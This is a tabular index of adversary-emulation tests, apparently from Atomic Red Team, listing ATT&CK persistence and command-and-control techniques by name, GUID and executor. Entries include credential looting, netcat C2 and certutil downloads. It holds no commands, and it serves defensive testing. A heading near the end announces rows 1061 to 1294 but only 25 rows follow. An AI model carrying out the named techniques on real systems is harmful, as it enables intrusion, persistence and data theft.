890 persistence T1574.006 Hijack Execution Flow: LD_PRELOAD 3 Dylib Injection via DYLD_INSERT_LIBRARIES 4d66029d-7355-43fd-93a4-b63ba92ea1be bash
891 persistence T1136.001 Create Account: Local Account 1 Create a user account on a Linux system 40d8eabd-e394-46f6-8785-b9bfa1d011d2 bash
892 persistence T1136.001 Create Account: Local Account 2 Create a user account on a MacOS system 01993ba5-1da3-4e15-a719-b690d4f0f0b2 bash
893 persistence T1136.001 Create Account: Local Account 3 Create a new user in a command prompt 6657864e-0323-4206-9344-ac9cd7265a4f command_prompt
894 persistence T1136.001 Create Account: Local Account 4 Create a new user in PowerShell bc8be0ac-475c-4fbf-9b1d-9fffd77afbde powershell
895 persistence T1136.001 Create Account: Local Account 5 Create a new user in Linux with `root` UID and GID. a1040a30-d28b-4eda-bd99-bb2861a4616c bash
896 persistence T1136.001 Create Account: Local Account 6 Create a new Windows admin user fda74566-a604-4581-a4cc-fbbe21d66559 command_prompt
897 persistence T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL 1 Winlogon Shell Key Persistence - PowerShell bf9f9d65-ee4d-4c3e-a843-777d04f19c38 powershell
898 persistence T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL 2 Winlogon Userinit Key Persistence - PowerShell fb32c935-ee2e-454b-8fa3-1c46b42e8dfb powershell
899 persistence T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL 3 Winlogon Notify Key Logon Persistence - PowerShell d40da266-e073-4e5a-bb8b-2b385023e5f9 powershell
900 persistence T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL 4 Winlogon HKLM Shell Key Persistence - PowerShell 95a3c42f-8c88-4952-ad60-13b81d929a9d powershell
901 persistence T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL 5 Winlogon HKLM Userinit Key Persistence - PowerShell f9b8daff-8fa7-4e6a-a1a7-7c14675a545b powershell
902 persistence T1098.004 SSH Authorized Keys 1 Modify SSH Authorized Keys 342cc723-127c-4d3a-8292-9c0c6b4ecadc bash
903 persistence T1546.012 Event Triggered Execution: Image File Execution Options Injection 1 IFEO Add Debugger fdda2626-5234-4c90-b163-60849a24c0b8 command_prompt
904 persistence T1546.012 Event Triggered Execution: Image File Execution Options Injection 2 IFEO Global Flags 46b1f278-c8ee-4aa5-acce-65e77b11f3c1 command_prompt
905 persistence T1546.012 Event Triggered Execution: Image File Execution Options Injection 3 GlobalFlags in Image File Execution Options 13117939-c9b2-4a43-999e-0a543df92f0d powershell
906 persistence T1546.008 Event Triggered Execution: Accessibility Features 1 Attaches Command Prompt as a Debugger to a List of Target Processes 3309f53e-b22b-4eb6-8fd2-a6cf58b355a9 powershell
907 persistence T1546.008 Event Triggered Execution: Accessibility Features 2 Replace binary of sticky keys 934e90cf-29ca-48b3-863c-411737ad44e3 command_prompt
908 persistence T1546.008 Event Triggered Execution: Accessibility Features 3 Create Symbolic Link From osk.exe to cmd.exe 51ef369c-5e87-4f33-88cd-6d61be63edf2 command_prompt
909 persistence T1136.002 Create Account: Domain Account 1 Create a new Windows domain admin user fcec2963-9951-4173-9bfa-98d8b7834e62 command_prompt
910 persistence T1136.002 Create Account: Domain Account 2 Create a new account similar to ANONYMOUS LOGON dc7726d2-8ccb-4cc6-af22-0d5afb53a548 command_prompt
911 persistence T1136.002 Create Account: Domain Account 3 Create a new Domain Account using PowerShell 5a3497a4-1568-4663-b12a-d4a5ed70c7d7 powershell
912 persistence T1546.009 Event Triggered Execution: AppCert DLLs 1 Create registry persistence via AppCert DLL a5ad6104-5bab-4c43-b295-b4c44c7c6b05 powershell
913 persistence T1547.015 Boot or Logon Autostart Execution: Login Items 1 Persistence by modifying Windows Terminal profile ec5d76ef-82fe-48da-b931-bdb25a62bc65 powershell
914 persistence T1547.015 Boot or Logon Autostart Execution: Login Items 2 Add macOS LoginItem using Applescript 716e756a-607b-41f3-8204-b214baf37c1d bash
915 persistence T1098.001 Account Manipulation: Additional Cloud Credentials 1 Azure AD Application Hijacking - Service Principal b8e747c3-bdf7-4d71-bce2-f1df2a057406 powershell
916 persistence T1098.001 Account Manipulation: Additional Cloud Credentials 2 Azure AD Application Hijacking - App Registration a12b5531-acab-4618-a470-0dafb294a87a powershell
917 persistence T1098.001 Account Manipulation: Additional Cloud Credentials 3 AWS - Create Access Key and Secret Key 8822c3b0-d9f9-4daf-a043-491160a31122 sh
918 persistence T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription 1 Persistence via WMI Event Subscription - CommandLineEventConsumer 3c64f177-28e2-49eb-a799-d767b24dd1e0 powershell
919 persistence T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription 2 Persistence via WMI Event Subscription - ActiveScriptEventConsumer fecd0dfd-fb55-45fa-a10b-6250272d0832 powershell
920 persistence T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription 3 Windows MOFComp.exe Load MOF File 29786d7e-8916-4de6-9c55-be7b093b2706 powershell
921 persistence T1546.001 Event Triggered Execution: Change Default File Association 1 Change Default File Association 10a08978-2045-4d62-8c42-1957bbbea102 command_prompt
922 persistence T1546.014 Event Triggered Execution: Emond 1 Persistance with Event Monitor - emond 23c9c127-322b-4c75-95ca-eff464906114 sh
923 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 1 Reg Key Run e55be3fd-3521-4610-9d1a-e210e42dcf05 command_prompt
924 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 2 Reg Key RunOnce 554cbd88-cde1-4b56-8168-0be552eed9eb command_prompt
925 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 3 PowerShell Registry RunOnce eb44f842-0457-4ddc-9b92-c4caa144ac42 powershell
926 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 4 Suspicious vbs file run from startup Folder 2cb98256-625e-4da9-9d44-f2e5f90b8bd5 powershell
927 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 5 Suspicious jse file run from startup Folder dade9447-791e-4c8f-b04b-3a35855dfa06 powershell
928 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 6 Suspicious bat file run from startup Folder 5b6768e4-44d2-44f0-89da-a01d1430fd5e powershell
929 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 7 Add Executable Shortcut Link to User Startup Folder 24e55612-85f6-4bd6-ae74-a73d02e3441d powershell
930 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 8 Add persistance via Recycle bin bda6a3d6-7aa7-4e89-908b-306772e9662f command_prompt
931 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 9 SystemBC Malware-as-a-Service Registry 9dc7767b-30c1-4cc4-b999-50cab5e27891 powershell
932 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 10 Change Startup Folder - HKLM Modify User Shell Folders Common Startup Value acfef903-7662-447e-a391-9c91c2f00f7b powershell
933 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 11 Change Startup Folder - HKCU Modify User Shell Folders Startup Value 8834b65a-f808-4ece-ad7e-2acdf647aafa powershell
934 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 12 HKCU - Policy Settings Explorer Run Key a70faea1-e206-4f6f-8d9a-67379be8f6f1 powershell
935 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 13 HKLM - Policy Settings Explorer Run Key b5c9a9bc-dda3-4ea0-b16a-add8e81ab75f powershell
936 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 14 HKLM - Append Command to Winlogon Userinit KEY Value f7fab6cc-8ece-4ca7-a0f1-30a22fccd374 powershell
937 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 15 HKLM - Modify default System Shell - Winlogon Shell KEY Value 1d958c61-09c6-4d9e-b26b-4130314e520e powershell
938 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 16 secedit used to create a Run key in the HKLM Hive 14fdc3f1-6fc3-4556-8d36-aa89d9d42d02 command_prompt
939 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 17 Modify BootExecute Value befc2b40-d487-4a5a-8813-c11085fb5672 powershell
940 persistence T1136.003 Create Account: Cloud Account 1 AWS - Create a new IAM user 8d1c2368-b503-40c9-9057-8e42f21c58ad sh
941 persistence T1136.003 Create Account: Cloud Account 2 Azure AD - Create a new user e62d23ef-3153-4837-8625-fa4a3829134d powershell
942 persistence T1136.003 Create Account: Cloud Account 3 Azure AD - Create a new user via Azure CLI 228c7498-be31-48e9-83b7-9cb906504ec8 powershell
943 persistence T1098 Account Manipulation 1 Admin Account Manipulate 5598f7cb-cf43-455e-883a-f6008c5d46af powershell
944 persistence T1098 Account Manipulation 2 Domain Account and Group Manipulate a55a22e9-a3d3-42ce-bd48-2653adb8f7a9 powershell
945 persistence T1098 Account Manipulation 3 AWS - Create a group and add a user to that group 8822c3b0-d9f9-4daf-a043-49f110a31122 sh
946 persistence T1098 Account Manipulation 4 Azure AD - adding user to Azure AD role 0e65ae27-5385-46b4-98ac-607a8ee82261 powershell
947 persistence T1098 Account Manipulation 5 Azure AD - adding service principal to Azure AD role 92c40b3f-c406-4d1f-8d2b-c039bf5009e4 powershell
948 persistence T1098 Account Manipulation 6 Azure - adding user to Azure role in subscription 1a94b3fc-b080-450a-b3d8-6d9b57b472ea powershell
949 persistence T1098 Account Manipulation 7 Azure - adding service principal to Azure role in subscription c8f4bc29-a151-48da-b3be-4680af56f404 powershell
950 persistence T1098 Account Manipulation 8 Azure AD - adding permission to application 94ea9cc3-81f9-4111-8dde-3fb54f36af4b powershell
951 persistence T1098 Account Manipulation 9 Password Change on Directory Service Restore Mode (DSRM) Account d5b886d9-d1c7-4b6e-a7b0-460041bf2823 command_prompt
952 persistence T1098 Account Manipulation 10 Domain Password Policy Check: Short Password fc5f9414-bd67-4f5f-a08e-e5381e29cbd1 powershell
953 persistence T1098 Account Manipulation 11 Domain Password Policy Check: No Number in Password 68190529-069b-4ffc-a942-919704158065 powershell
954 persistence T1098 Account Manipulation 12 Domain Password Policy Check: No Special Character in Password 7d984ef2-2db2-4cec-b090-e637e1698f61 powershell
955 persistence T1098 Account Manipulation 13 Domain Password Policy Check: No Uppercase Character in Password b299c120-44a7-4d68-b8e2-8ba5a28511ec powershell
956 persistence T1098 Account Manipulation 14 Domain Password Policy Check: No Lowercase Character in Password 945da11e-977e-4dab-85d2-f394d03c5887 powershell
957 persistence T1098 Account Manipulation 15 Domain Password Policy Check: Only Two Character Classes 784d1349-5a26-4d20-af5e-d6af53bae460 powershell
958 persistence T1098 Account Manipulation 16 Domain Password Policy Check: Common Password Use 81959d03-c51f-49a1-bb24-23f1ec885578 powershell
959 persistence T1547.006 Boot or Logon Autostart Execution: Kernel Modules and Extensions 1 Linux - Load Kernel Module via insmod 687dcb93-9656-4853-9c36-9977315e9d23 bash
960 persistence T1547.006 Boot or Logon Autostart Execution: Kernel Modules and Extensions 2 MacOS - Load Kernel Module via kextload and kmutil f4391089-d3a5-4dd1-ab22-0419527f2672 bash
961 persistence T1547.006 Boot or Logon Autostart Execution: Kernel Modules and Extensions 3 MacOS - Load Kernel Module via KextManagerLoadKextWithURL() f0007753-beb3-41ea-9948-760785e4c1e5 bash
962 persistence T1547.006 Boot or Logon Autostart Execution: Kernel Modules and Extensions 4 Snake Malware Kernel Driver Comadmin e5cb5564-cc7b-4050-86e8-f2d9eec1941f powershell
963 persistence T1053.006 Scheduled Task/Job: Systemd Timers 1 Create Systemd Service and Timer f4983098-bb13-44fb-9b2c-46149961807b bash
964 persistence T1053.006 Scheduled Task/Job: Systemd Timers 2 Create a user level transient systemd service and timer 3de33f5b-62e5-4e63-a2a0-6fd8808c80ec sh
965 persistence T1053.006 Scheduled Task/Job: Systemd Timers 3 Create a system level transient systemd service and timer d3eda496-1fc0-49e9-aff5-3bec5da9fa22 sh
966 persistence T1505.004 IIS Components 1 Install IIS Module using AppCmd.exe 53adbdfa-8200-490c-871c-d3b1ab3324b2 command_prompt
967 persistence T1505.004 IIS Components 2 Install IIS Module using PowerShell Cmdlet New-WebGlobalModule cc3381fb-4bd0-405c-a8e4-6cacfac3b06c powershell
968 persistence T1546 Event Triggered Execution 1 Persistence with Custom AutodialDLL aca9ae16-7425-4b6d-8c30-cad306fdbd5b powershell
969 persistence T1546 Event Triggered Execution 2 HKLM - Persistence using CommandProcessor AutoRun key (With Elevation) a574dafe-a903-4cce-9701-14040f4f3532 powershell
970 persistence T1546 Event Triggered Execution 3 HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation) 36b8dbf9-59b1-4e9b-a3bb-36e80563ef01 powershell
971 persistence T1546 Event Triggered Execution 4 WMI Invoke-CimMethod Start Process adae83d3-0df6-45e7-b2c3-575f91584577 powershell
972 persistence T1546.004 Event Triggered Execution: .bash_profile and .bashrc 1 Add command to .bash_profile 94500ae1-7e31-47e3-886b-c328da46872f sh
973 persistence T1546.004 Event Triggered Execution: .bash_profile and .bashrc 2 Add command to .bashrc 0a898315-4cfa-4007-bafe-33a4646d115f sh
974 persistence T1546.004 Event Triggered Execution: .bash_profile and .bashrc 3 Append to the system shell profile 694b3cc8-6a78-4d35-9e74-0123d009e94b sh
975 persistence T1546.004 Event Triggered Execution: .bash_profile and .bashrc 4 Append commands user shell profile bbdb06bc-bab6-4f5b-8232-ba3fbed51d77 sh
976 persistence T1546.004 Event Triggered Execution: .bash_profile and .bashrc 5 System shell profile scripts 8fe2ccfd-f079-4c03-b1a9-bd9b362b67d4 sh
977 persistence T1546.004 Event Triggered Execution: .bash_profile and .bashrc 6 Create/Append to .bash_logout 37ad2f24-7c53-4a50-92da-427a4ad13f58 bash
978 persistence T1547.002 Authentication Package 1 Authentication Package be2590e8-4ac3-47ac-b4b5-945820f2fbe9 powershell
979 persistence T1546.015 Event Triggered Execution: Component Object Model Hijacking 1 COM Hijacking - InprocServer32 48117158-d7be-441b-bc6a-d9e36e47b52b powershell
980 persistence T1546.015 Event Triggered Execution: Component Object Model Hijacking 2 Powershell Execute COM Object 752191b1-7c71-445c-9dbe-21bb031b18eb powershell
981 persistence T1546.015 Event Triggered Execution: Component Object Model Hijacking 3 COM Hijacking with RunDLL32 (Local Server Switch) 123520cc-e998-471b-a920-bd28e3feafa0 powershell
982 persistence T1546.015 Event Triggered Execution: Component Object Model Hijacking 4 COM hijacking via TreatAs 33eacead-f117-4863-8eb0-5c6304fbfaa9 powershell
983 persistence T1137.004 Office Application Startup: Outlook Home Page 1 Install Outlook Home Page Persistence 7a91ad51-e6d2-4d43-9471-f26362f5738e command_prompt
984 persistence T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path 1 Execution of program.exe as service with unquoted service path 2770dea7-c50f-457b-84c4-c40a47460d9f command_prompt
985 persistence T1037.005 Boot or Logon Initialization Scripts: Startup Items 1 Add file to Local Library StartupItems 134627c3-75db-410e-bff8-7a920075f198 sh
986 persistence T1197 BITS Jobs 1 Bitsadmin Download (cmd) 3c73d728-75fb-4180-a12f-6712864d7421 command_prompt
987 persistence T1197 BITS Jobs 2 Bitsadmin Download (PowerShell) f63b8bc4-07e5-4112-acba-56f646f3f0bc powershell
988 persistence T1197 BITS Jobs 3 Persist, Download, & Execute 62a06ec5-5754-47d2-bcfc-123d8314c6ae command_prompt
989 persistence T1197 BITS Jobs 4 Bits download using desktopimgdownldr.exe (cmd) afb5e09e-e385-4dee-9a94-6ee60979d114 command_prompt
990 persistence T1546.010 Event Triggered Execution: AppInit DLLs 1 Install AppInit Shim a58d9386-3080-4242-ab5f-454c16503d18 command_prompt
991 persistence T1546.002 Event Triggered Execution: Screensaver 1 Set Arbitrary Binary as Screensaver 281201e7-de41-4dc9-b73d-f288938cbb64 command_prompt
992 persistence T1543.001 Create or Modify System Process: Launch Agent 1 Launch Agent a5983dee-bf6c-4eaf-951c-dbc1a7b90900 bash
993 persistence T1543.001 Create or Modify System Process: Launch Agent 2 Event Monitor Daemon Persistence 11979f23-9b9d-482a-9935-6fc9cd022c3e bash
994 persistence T1037.004 Boot or Logon Initialization Scripts: Rc.common 1 rc.common 97a48daa-8bca-4bc0-b1a9-c1d163e762de bash
995 persistence T1037.004 Boot or Logon Initialization Scripts: Rc.common 2 rc.common c33f3d80-5f04-419b-a13a-854d1cbdbf3a bash
996 persistence T1037.004 Boot or Logon Initialization Scripts: Rc.common 3 rc.local 126f71af-e1c9-405c-94ef-26a47b16c102 bash
997 persistence T1543.002 Create or Modify System Process: Systemd Service 1 Create Systemd Service d9e4f24f-aa67-4c6e-bcbf-85622b697a7c bash
998 persistence T1543.002 Create or Modify System Process: Systemd Service 2 Create Systemd Service file, Enable the service , Modify and Reload the service. c35ac4a8-19de-43af-b9f8-755da7e89c89 bash
999 persistence T1547.007 Boot or Logon Autostart Execution: Re-opened Applications 1 Copy in loginwindow.plist for Re-Opened Applications 5fefd767-ef54-4ac6-84d3-751ab85e8aba sh
1000 persistence T1547.007 Boot or Logon Autostart Execution: Re-opened Applications 2 Re-Opened Applications using LoginHook 5f5b71da-e03f-42e7-ac98-d63f9e0465cb sh
1001 persistence T1547.007 Boot or Logon Autostart Execution: Re-opened Applications 3 Append to existing loginwindow for Re-Opened Applications 766b6c3c-9353-4033-8b7e-38b309fa3a93 sh
1002 persistence T1574.002 Hijack Execution Flow: DLL Side-Loading 1 DLL Side-Loading using the Notepad++ GUP.exe binary 65526037-7079-44a9-bda1-2cb624838040 command_prompt
1003 persistence T1574.002 Hijack Execution Flow: DLL Side-Loading 2 DLL Side-Loading using the dotnet startup hook environment variable d322cdd7-7d60-46e3-9111-648848da7c02 command_prompt
1004 persistence T1037.001 Boot or Logon Initialization Scripts: Logon Script (Windows) 1 Logon Scripts d6042746-07d4-4c92-9ad8-e644c114a231 command_prompt
1005 persistence T1137.002 Office Application Startup: Office Test 1 Office Application Startup Test Persistence (HKCU) c3e35b58-fe1c-480b-b540-7600fb612563 powershell
1006 persistence T1547.008 Boot or Logon Autostart Execution: LSASS Driver 1 Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt 8ecef16d-d289-46b4-917b-0dba6dc81cf1 powershell
1007 persistence T1078.004 Valid Accounts: Cloud Accounts 1 Creating GCP Service Account and Service Account Key 9fdd83fd-bd53-46e5-a716-9dec89c8ae8e sh
1008 persistence T1078.004 Valid Accounts: Cloud Accounts 2 Azure Persistence Automation Runbook Created or Modified 348f4d14-4bd3-4f6b-bd8a-61237f78b3ac powershell
1009 persistence T1053.002 Scheduled Task/Job: At 1 At.exe Scheduled task 4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8 command_prompt
1010 persistence T1053.002 Scheduled Task/Job: At 2 At - Schedule a job 7266d898-ac82-4ec0-97c7-436075d0d08e sh
1011 persistence T1546.007 Event Triggered Execution: Netsh Helper DLL 1 Netsh Helper DLL Registration 3244697d-5a3a-4dfc-941c-550f69f91a4d command_prompt
1012 persistence T1078.003 Valid Accounts: Local Accounts 1 Create local account with admin privileges a524ce99-86de-4db6-b4f9-e08f35a47a15 command_prompt
1013 persistence T1078.003 Valid Accounts: Local Accounts 2 Create local account with admin privileges - MacOS f1275566-1c26-4b66-83e3-7f9f7f964daa bash
1014 persistence T1078.003 Valid Accounts: Local Accounts 3 Create local account with admin privileges using sysadminctl utility - MacOS 191db57d-091a-47d5-99f3-97fde53de505 bash
1015 persistence T1078.003 Valid Accounts: Local Accounts 4 Enable root account using dsenableroot utility - MacOS 20b40ea9-0e17-4155-b8e6-244911a678ac bash
1016 persistence T1078.003 Valid Accounts: Local Accounts 5 Add a new/existing user to the admin group using dseditgroup utility - macOS 433842ba-e796-4fd5-a14f-95d3a1970875 bash
1017 persistence T1078.003 Valid Accounts: Local Accounts 6 WinPwn - Loot local Credentials - powerhell kittie 9e9fd066-453d-442f-88c1-ad7911d32912 powershell
1018 persistence T1078.003 Valid Accounts: Local Accounts 7 WinPwn - Loot local Credentials - Safetykatz e9fdb899-a980-4ba4-934b-486ad22e22f4 powershell
1019 persistence T1078.003 Valid Accounts: Local Accounts 8 Create local account (Linux) 02a91c34-8a5b-4bed-87af-501103eb5357 bash
1020 persistence T1078.003 Valid Accounts: Local Accounts 9 Reactivate a locked/expired account (Linux) d2b95631-62d7-45a3-aaef-0972cea97931 bash
1021 persistence T1078.003 Valid Accounts: Local Accounts 10 Login as nobody (Linux) 3d2cd093-ee05-41bd-a802-59ee5c301b85 bash
1022 persistence T1574.012 Hijack Execution Flow: COR_PROFILER 1 User scope COR_PROFILER 9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a powershell
1023 persistence T1574.012 Hijack Execution Flow: COR_PROFILER 2 System Scope COR_PROFILER f373b482-48c8-4ce4-85ed-d40c8b3f7310 powershell
1024 persistence T1574.012 Hijack Execution Flow: COR_PROFILER 3 Registry-free process scope COR_PROFILER 79d57242-bbef-41db-b301-9d01d9f6e817 powershell
1025 command-and-control T1132.001 Data Encoding: Standard Encoding 1 Base64 Encoded data. 1164f70f-9a88-4dff-b9ff-dc70e7bf0c25 sh
1026 command-and-control T1132.001 Data Encoding: Standard Encoding 2 XOR Encoded data. c3ed6d2a-e3ad-400d-ad78-bbfdbfeacc08 powershell
1027 command-and-control T1071.004 Application Layer Protocol: DNS 1 DNS Large Query Volume 1700f5d6-5a44-487b-84de-bc66f507b0a6 powershell
1028 command-and-control T1071.004 Application Layer Protocol: DNS 2 DNS Regular Beaconing 3efc144e-1af8-46bb-8ca2-1376bb6db8b6 powershell
1029 command-and-control T1071.004 Application Layer Protocol: DNS 3 DNS Long Domain Query fef31710-223a-40ee-8462-a396d6b66978 powershell
1030 command-and-control T1071.004 Application Layer Protocol: DNS 4 DNS C2 e7bf9802-2e78-4db9-93b5-181b7bcd37d7 powershell
1031 command-and-control T1219 Remote Access Software 1 TeamViewer Files Detected Test on Windows 8ca3b96d-8983-4a7f-b125-fc98cc0a2aa0 powershell
1032 command-and-control T1219 Remote Access Software 2 AnyDesk Files Detected Test on Windows 6b8b7391-5c0a-4f8c-baee-78d8ce0ce330 powershell
1033 command-and-control T1219 Remote Access Software 3 LogMeIn Files Detected Test on Windows d03683ec-aae0-42f9-9b4c-534780e0f8e1 powershell
1034 command-and-control T1219 Remote Access Software 4 GoToAssist Files Detected Test on Windows 1b72b3bd-72f8-4b63-a30b-84e91b9c3578 powershell
1035 command-and-control T1219 Remote Access Software 5 ScreenConnect Application Download and Install on Windows 4a18cc4e-416f-4966-9a9d-75731c4684c0 powershell
1036 command-and-control T1219 Remote Access Software 6 Ammyy Admin Software Execution 0ae9e327-3251-465a-a53b-485d4e3f58fa powershell
1037 command-and-control T1219 Remote Access Software 7 RemotePC Software Execution fbff3f1f-b0bf-448e-840f-7e1687affdce powershell
1038 command-and-control T1219 Remote Access Software 8 NetSupport - RAT Execution ecca999b-e0c8-40e8-8416-ad320b146a75 powershell
1039 command-and-control T1219 Remote Access Software 9 UltraViewer - RAT Execution 19acf63b-55c4-4b6a-8552-00a8865105c8 powershell
1040 command-and-control T1219 Remote Access Software 10 UltraVNC Execution 42e51815-a6cc-4c75-b970-3f0ff54b610e powershell
1041 command-and-control T1219 Remote Access Software 11 MSP360 Connect Execution b1b8128b-c5d4-4de9-bf70-e60419274562 powershell
1042 command-and-control T1572 Protocol Tunneling 1 DNS over HTTPS Large Query Volume ae9ef4b0-d8c1-49d4-8758-06206f19af0a powershell
1043 command-and-control T1572 Protocol Tunneling 2 DNS over HTTPS Regular Beaconing 0c5f9705-c575-42a6-9609-cbbff4b2fc9b powershell
1044 command-and-control T1572 Protocol Tunneling 3 DNS over HTTPS Long Domain Query 748a73d5-cea4-4f34-84d8-839da5baa99c powershell
1045 command-and-control T1090.003 Proxy: Multi-hop Proxy 1 Psiphon 14d55ca0-920e-4b44-8425-37eedd72b173 powershell
1046 command-and-control T1090.003 Proxy: Multi-hop Proxy 2 Tor Proxy Usage - Windows 7b9d85e5-c4ce-4434-8060-d3de83595e69 powershell
1047 command-and-control T1090.003 Proxy: Multi-hop Proxy 3 Tor Proxy Usage - Debian/Ubuntu 5ff9d047-6e9c-4357-b39b-5cf89d9b59c7 sh
1048 command-and-control T1090.003 Proxy: Multi-hop Proxy 4 Tor Proxy Usage - MacOS 12631354-fdbc-4164-92be-402527e748da sh
1049 command-and-control T1571 Non-Standard Port 1 Testing usage of uncommonly used port with PowerShell 21fe622f-8e53-4b31-ba83-6d333c2583f4 powershell
1050 command-and-control T1571 Non-Standard Port 2 Testing usage of uncommonly used port 5db21e1d-dd9c-4a50-b885-b1e748912767 sh
1051 command-and-control T1573 Encrypted Channel 1 OpenSSL C2 21caf58e-87ad-440c-a6b8-3ac259964003 powershell
1052 command-and-control T1095 Non-Application Layer Protocol 1 ICMP C2 0268e63c-e244-42db-bef7-72a9e59fc1fc powershell
1053 command-and-control T1095 Non-Application Layer Protocol 2 Netcat C2 bcf0d1c1-3f6a-4847-b1c9-7ed4ea321f37 powershell
1054 command-and-control T1095 Non-Application Layer Protocol 3 Powercat C2 3e0e0e7f-6aa2-4a61-b61d-526c2cc9330e powershell
1055 command-and-control T1071.001 Application Layer Protocol: Web Protocols 1 Malicious User Agents - Powershell 81c13829-f6c9-45b8-85a6-053366d55297 powershell
1056 command-and-control T1071.001 Application Layer Protocol: Web Protocols 2 Malicious User Agents - CMD dc3488b0-08c7-4fea-b585-905c83b48180 command_prompt
1057 command-and-control T1071.001 Application Layer Protocol: Web Protocols 3 Malicious User Agents - Nix 2d7c471a-e887-4b78-b0dc-b0df1f2e0658 sh
1058 command-and-control T1105 Ingress Tool Transfer 1 rsync remote file copy (push) 0fc6e977-cb12-44f6-b263-2824ba917409 bash
1059 command-and-control T1105 Ingress Tool Transfer 2 rsync remote file copy (pull) 3180f7d5-52c0-4493-9ea0-e3431a84773f bash
1060 command-and-control T1105 Ingress Tool Transfer 3 scp remote file copy (push) 83a49600-222b-4866-80a0-37736ad29344 bash
Atomic test index, rows 1061 to 1294 (command-and-control, collection, lateral-movement and credential-access entries):

| Tactic | Technique # | Technique Name | Test # | Test Name | Test GUID | Executor |
|---|---|---|---|---|---|---|
| command-and-control | T1105 | Ingress Tool Transfer | 4 | scp remote file copy (pull) | b9d22b9a-9778-4426-abf0-568ea64e9c33 | bash |
| command-and-control | T1105 | Ingress Tool Transfer | 5 | sftp remote file copy (push) | f564c297-7978-4aa9-b37a-d90477feea4e | bash |
| command-and-control | T1105 | Ingress Tool Transfer | 6 | sftp remote file copy (pull) | 0139dba1-f391-405e-a4f5-f3989f2c88ef | bash |
| command-and-control | T1105 | Ingress Tool Transfer | 7 | certutil download (urlcache) | dd3b61dd-7bbc-48cd-ab51-49ad1a776df0 | command_prompt |
| command-and-control | T1105 | Ingress Tool Transfer | 8 | certutil download (verifyctl) | ffd492e3-0455-4518-9fb1-46527c9f241b | powershell |
| command-and-control | T1105 | Ingress Tool Transfer | 9 | Windows - BITSAdmin BITS Download | a1921cd3-9a2d-47d5-a891-f1d0f2a7a31b | command_prompt |
| command-and-control | T1105 | Ingress Tool Transfer | 10 | Windows - PowerShell Download | 42dc4460-9aa6-45d3-b1a6-3955d34e1fe8 | powershell |
| command-and-control | T1105 | Ingress Tool Transfer | 11 | OSTAP Worming Activity | 2ca61766-b456-4fcf-a35a-1233685e1cad | command_prompt |
| command-and-control | T1105 | Ingress Tool Transfer | 12 | svchost writing a file to a UNC path | fa5a2759-41d7-4e13-a19c-e8f28a53566f | command_prompt |
| command-and-control | T1105 | Ingress Tool Transfer | 13 | Download a File with Windows Defender MpCmdRun.exe | 815bef8b-bf91-4b67-be4c-abe4c2a94ccc | command_prompt |
| command-and-control | T1105 | Ingress Tool Transfer | 14 | whois file download | c99a829f-0bb8-4187-b2c6-d47d1df74cab | sh |
| command-and-control | T1105 | Ingress Tool Transfer | 15 | File Download via PowerShell | 54a4daf1-71df-4383-9ba7-f1a295d8b6d2 | powershell |
| command-and-control | T1105 | Ingress Tool Transfer | 16 | File download with finger.exe on Windows | 5f507e45-8411-4f99-84e7-e38530c45d01 | command_prompt |
| command-and-control | T1105 | Ingress Tool Transfer | 17 | Download a file with IMEWDBLD.exe | 1a02df58-09af-4064-a765-0babe1a0d1e2 | powershell |
| command-and-control | T1105 | Ingress Tool Transfer | 18 | Curl Download File | 2b080b99-0deb-4d51-af0f-833d37c4ca6a | command_prompt |
| command-and-control | T1105 | Ingress Tool Transfer | 19 | Curl Upload File | 635c9a38-6cbf-47dc-8615-3810bc1167cf | command_prompt |
| command-and-control | T1105 | Ingress Tool Transfer | 20 | Download a file with Microsoft Connection Manager Auto-Download | d239772b-88e2-4a2e-8473-897503401bcc | command_prompt |
| command-and-control | T1105 | Ingress Tool Transfer | 21 | MAZE Propagation Script | 70f4d07c-5c3e-4d53-bb0a-cdf3ada14baf | powershell |
| command-and-control | T1105 | Ingress Tool Transfer | 22 | Printer Migration Command-Line Tool UNC share folder into a zip file | 49845fc1-7961-4590-a0f0-3dbcf065ae7e | command_prompt |
| command-and-control | T1105 | Ingress Tool Transfer | 23 | Lolbas replace.exe use to copy file | 54782d65-12f0-47a5-b4c1-b70ee23de6df | command_prompt |
| command-and-control | T1105 | Ingress Tool Transfer | 24 | Lolbas replace.exe use to copy UNC file | ed0335ac-0354-400c-8148-f6151d20035a | command_prompt |
| command-and-control | T1105 | Ingress Tool Transfer | 25 | certreq download | 6fdaae87-c05b-42f8-842e-991a74e8376b | command_prompt |
